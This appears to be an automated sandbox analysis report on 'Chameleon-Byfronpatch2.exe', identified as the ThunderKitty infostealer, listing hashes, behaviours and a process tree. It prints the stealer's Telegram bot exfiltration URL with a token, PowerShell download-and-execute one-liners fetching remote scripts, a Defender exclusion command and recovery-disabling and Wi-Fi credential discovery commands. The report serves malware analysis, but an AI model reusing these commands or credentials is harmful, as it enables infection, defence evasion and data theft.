Analysis
-
max time kernel
156s -
max time network
156s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
13/08/2024, 22:42
Behavioral task
behavioral1
Sample
Chameleon-Byfronpatch2.exe
Resource
win11-20240802-en
General
-
Target
Chameleon-Byfronpatch2.exe
-
Size
9.2MB
-
MD5
addbf6301c1ea797554a0152da23d5ae
-
SHA1
01a22ed2bb77ff84546147098348a07bc0eecbc6
-
SHA256
585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
-
SHA512
9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
-
SSDEEP
98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc
Malware Config
Extracted
thunderkittystealer
https://api.telegram.org/bot7313166053:AAHuGOvyp2uwh4XDuUaFOzKqdwz2pEZCs_o/sendMessage?chat_id=-4242365683
Signatures
-
ThunderKitty Stealer
ThunderKitty Stealer is an open-source stealer written in Golang.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 4 IoCs
flow pid Process 7 5776 powershell.exe 8 2012 powershell.exe 37 5128 powershell.exe 38 1904 powershell.exe -
pid Process 2012 powershell.exe 5128 powershell.exe 1904 powershell.exe 5776 powershell.exe 4188 powershell.exe 4656 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Drivers\etc\hosts Chameleon-Byfronpatch2.exe File opened for modification C:\Windows\System32\Drivers\etc\hosts Chameleon-Byfronpatch2.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2052 netsh.exe 996 netsh.exe -
Executes dropped EXE 1 IoCs
pid Process 3056 Chameleon-Byfronpatch2.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 37 raw.githubusercontent.com 38 raw.githubusercontent.com 1 raw.githubusercontent.com 4 raw.githubusercontent.com 7 raw.githubusercontent.com 8 raw.githubusercontent.com -
pid Process 5636 ARP.EXE 3900 ARP.EXE -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery reagentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml reagentc.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml reagentc.exe File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log reagentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml reagentc.exe -
Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs
When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.
description ioc Process File opened for modification C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe:Zone.Identifier chrome.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5812 netsh.exe 1160 netsh.exe 3304 netsh.exe 4732 netsh.exe -
System Network Connections Discovery 1 TTPs 2 IoCs
Attempt to get a listing of network connections.
pid Process 1492 NETSTAT.EXE 1664 NETSTAT.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
pid Process 3716 ipconfig.exe 1664 NETSTAT.EXE 5720 ipconfig.exe 1256 ipconfig.exe 1492 NETSTAT.EXE 2408 ipconfig.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133680626352364715" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Chameleon-Byfronpatch2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Chameleon-Byfronpatch2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000019000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877604000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f Chameleon-Byfronpatch2.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Chameleon-Byfronpatch2.exe:Zone.Identifier chrome.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3348 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4188 powershell.exe 2012 powershell.exe 5776 powershell.exe 2012 powershell.exe 4188 powershell.exe 5776 powershell.exe 2012 powershell.exe 1972 chrome.exe 1972 chrome.exe 5128 powershell.exe 5128 powershell.exe 1904 powershell.exe 1904 powershell.exe 4656 powershell.exe 4656 powershell.exe 1904 powershell.exe 4656 powershell.exe 5128 powershell.exe 1904 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
pid Process 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4188 powershell.exe Token: SeDebugPrivilege 5776 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe Token: 35 2012 powershell.exe Token: 36 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe Token: 35 2012 powershell.exe Token: 36 2012 powershell.exe Token: SeIncreaseQuotaPrivilege 2012 powershell.exe Token: SeSecurityPrivilege 2012 powershell.exe Token: SeTakeOwnershipPrivilege 2012 powershell.exe Token: SeLoadDriverPrivilege 2012 powershell.exe Token: SeSystemProfilePrivilege 2012 powershell.exe Token: SeSystemtimePrivilege 2012 powershell.exe Token: SeProfSingleProcessPrivilege 2012 powershell.exe Token: SeIncBasePriorityPrivilege 2012 powershell.exe Token: SeCreatePagefilePrivilege 2012 powershell.exe Token: SeBackupPrivilege 2012 powershell.exe Token: SeRestorePrivilege 2012 powershell.exe Token: SeShutdownPrivilege 2012 powershell.exe Token: SeDebugPrivilege 2012 powershell.exe Token: SeSystemEnvironmentPrivilege 2012 powershell.exe Token: SeRemoteShutdownPrivilege 2012 powershell.exe Token: SeUndockPrivilege 2012 powershell.exe Token: SeManageVolumePrivilege 2012 powershell.exe Token: 33 2012 powershell.exe Token: 34 2012 powershell.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
pid Process 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe 1972 chrome.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4404 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5300 wrote to memory of 5368 5300 Chameleon-Byfronpatch2.exe 79 PID 5300 wrote to memory of 5368 5300 Chameleon-Byfronpatch2.exe 79 PID 5300 wrote to memory of 4188 5300 Chameleon-Byfronpatch2.exe 81 PID 5300 wrote to memory of 4188 5300 Chameleon-Byfronpatch2.exe 81 PID 5300 wrote to memory of 5776 5300 Chameleon-Byfronpatch2.exe 84 PID 5300 wrote to memory of 5776 5300 Chameleon-Byfronpatch2.exe 84 PID 5300 wrote to memory of 2060 5300 Chameleon-Byfronpatch2.exe 85 PID 5300 wrote to memory of 2060 5300 Chameleon-Byfronpatch2.exe 85 PID 5300 wrote to memory of 1068 5300 Chameleon-Byfronpatch2.exe 82 PID 5300 wrote to memory of 1068 5300 Chameleon-Byfronpatch2.exe 82 PID 5300 wrote to memory of 2012 5300 Chameleon-Byfronpatch2.exe 88 PID 5300 wrote to memory of 2012 5300 Chameleon-Byfronpatch2.exe 88 PID 2060 wrote to memory of 3084 2060 cmd.exe 91 PID 2060 wrote to memory of 3084 2060 cmd.exe 91 PID 2012 wrote to memory of 6068 2012 powershell.exe 92 PID 2012 wrote to memory of 6068 2012 powershell.exe 92 PID 5776 wrote to memory of 5132 5776 powershell.exe 93 PID 5776 wrote to memory of 5132 5776 powershell.exe 93 PID 6068 wrote to memory of 3100 6068 csc.exe 94 PID 6068 wrote to memory of 3100 6068 csc.exe 94 PID 5132 wrote to memory of 2556 5132 csc.exe 95 PID 5132 wrote to memory of 2556 5132 csc.exe 95 PID 2012 wrote to memory of 5812 2012 powershell.exe 96 PID 2012 wrote to memory of 5812 2012 powershell.exe 96 PID 2012 wrote to memory of 4248 2012 powershell.exe 98 PID 2012 wrote to memory of 4248 2012 powershell.exe 98 PID 4248 wrote to memory of 4436 4248 net.exe 99 PID 4248 wrote to memory of 4436 4248 net.exe 99 PID 2012 wrote to memory of 2052 2012 powershell.exe 100 PID 2012 wrote to memory of 2052 2012 powershell.exe 100 PID 2012 wrote to memory of 5880 2012 powershell.exe 101 PID 2012 wrote to memory of 5880 2012 powershell.exe 101 PID 2012 wrote to memory of 4136 2012 powershell.exe 102 PID 2012 wrote to memory of 4136 2012 powershell.exe 102 PID 4136 wrote to memory of 3856 4136 net.exe 103 PID 4136 wrote to memory of 3856 4136 net.exe 103 PID 2012 wrote to memory of 1256 2012 powershell.exe 104 PID 2012 wrote to memory of 1256 2012 powershell.exe 104 PID 2012 wrote to memory of 1932 2012 powershell.exe 105 PID 2012 wrote to memory of 1932 2012 powershell.exe 105 PID 1932 wrote to memory of 3296 1932 net.exe 106 PID 1932 wrote to memory of 3296 1932 net.exe 106 PID 2012 wrote to memory of 1756 2012 powershell.exe 107 PID 2012 wrote to memory of 1756 2012 powershell.exe 107 PID 2012 wrote to memory of 1492 2012 powershell.exe 108 PID 2012 wrote to memory of 1492 2012 powershell.exe 108 PID 2012 wrote to memory of 5228 2012 powershell.exe 109 PID 2012 wrote to memory of 5228 2012 powershell.exe 109 PID 2012 wrote to memory of 2408 2012 powershell.exe 110 PID 2012 wrote to memory of 2408 2012 powershell.exe 110 PID 2012 wrote to memory of 5064 2012 powershell.exe 111 PID 2012 wrote to memory of 5064 2012 powershell.exe 111 PID 2012 wrote to memory of 5636 2012 powershell.exe 112 PID 2012 wrote to memory of 5636 2012 powershell.exe 112 PID 2012 wrote to memory of 1160 2012 powershell.exe 113 PID 2012 wrote to memory of 1160 2012 powershell.exe 113 PID 1972 wrote to memory of 1672 1972 chrome.exe 121 PID 1972 wrote to memory of 1672 1972 chrome.exe 121 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 PID 1972 wrote to memory of 6004 1972 chrome.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5368 attrib.exe 2436 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:5300 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps12⤵
- Views/modifies file attributes
PID:5368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -C "Add-MpPreference -ExclusionPath 'C:'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4188
-
-
C:\Windows\system32\reagentc.exereagentc.exe /disable2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5776 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qyn55xib\qyn55xib.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:5132 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B5.tmp" "c:\Users\Admin\AppData\Local\Temp\qyn55xib\CSC3F391B89505D48BBADC2C965889EB35.TMP"4⤵PID:2556
-
-
-
-
C:\Windows\system32\cmd.execmd /c rundll32.exe user32.dll,SwapMouseButton2⤵
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\system32\rundll32.exerundll32.exe user32.dll,SwapMouseButton3⤵PID:3084
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\du4mrtky\du4mrtky.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:6068 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79B4.tmp" "c:\Users\Admin\AppData\Local\Temp\du4mrtky\CSCB6DF2AF8DD7446C6B88FD85555F350E1.TMP"4⤵PID:3100
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profiles3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:5812
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup administrators3⤵
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators4⤵PID:4436
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall show allprofiles3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:2052
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /all3⤵PID:5880
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" user3⤵
- Suspicious use of WriteProcessMemory
PID:4136 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user4⤵PID:3856
-
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /displaydns3⤵
- Gathers network information
PID:1256
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup3⤵
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup4⤵PID:3296
-
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" startup get command caption3⤵PID:1756
-
-
C:\Windows\system32\NETSTAT.EXE"C:\Windows\system32\NETSTAT.EXE" -ano3⤵
- System Network Connections Discovery
- Gathers network information
PID:1492
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe3⤵PID:5228
-
-
C:\Windows\system32\ipconfig.exe"C:\Windows\system32\ipconfig.exe" /all3⤵
- Gathers network information
PID:2408
-
-
C:\Windows\system32\ROUTE.EXE"C:\Windows\system32\ROUTE.EXE" print3⤵PID:5064
-
-
C:\Windows\system32\ARP.EXE"C:\Windows\system32\ARP.EXE" -a3⤵
- Network Service Discovery
PID:5636
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" wlan show profile3⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:1160
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding1⤵PID:1904
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
